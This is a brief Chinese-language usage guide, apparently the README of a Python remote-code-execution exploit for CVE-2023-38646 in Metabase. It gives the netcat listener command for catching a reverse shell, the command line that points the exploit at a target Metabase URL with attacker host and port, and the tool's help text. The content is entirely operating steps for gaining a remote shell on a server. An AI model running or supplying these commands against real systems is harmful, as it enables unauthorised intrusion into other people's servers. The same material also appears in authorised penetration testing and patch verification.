针对 CVE-2023-38646 的 Python RCE 漏洞利用程序
nc -lvnp <port>
python3 CVE-2023-38646.py -u <metabase_url> -l <local_ip> -p <local_port>
python3 CVE-2023-38646.py -h
usage: CVE-2023-38646.py [-h] -u URL -l LHOST -p LPORT
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 要利用的URL(Metabase根路径)
-l LHOST, --lhost LHOST
反向Shell的LHOST
-p LPORT, --lport LPORT
反向Shell的LPORT